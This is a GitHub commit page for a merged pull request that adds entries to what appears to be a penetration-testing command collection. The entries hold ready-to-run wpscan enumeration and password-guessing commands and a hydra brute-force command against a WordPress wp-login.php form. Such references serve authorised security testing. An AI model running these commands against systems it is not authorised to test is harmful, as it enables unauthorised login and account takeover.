Merge pull request #232 from CoolHandSquid/HAC-Web

HAC Web
This commit is contained in:
Carlos Polop 2021-09-25 15:16:44 +01:00 committed by GitHub
commit c8572dd846
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -373,5 +373,10 @@ Entry_10:
Command: |
?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
Entry_11:
Name: WordPress Hydra Brute Force
Description: Need User (admin is default)
Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
```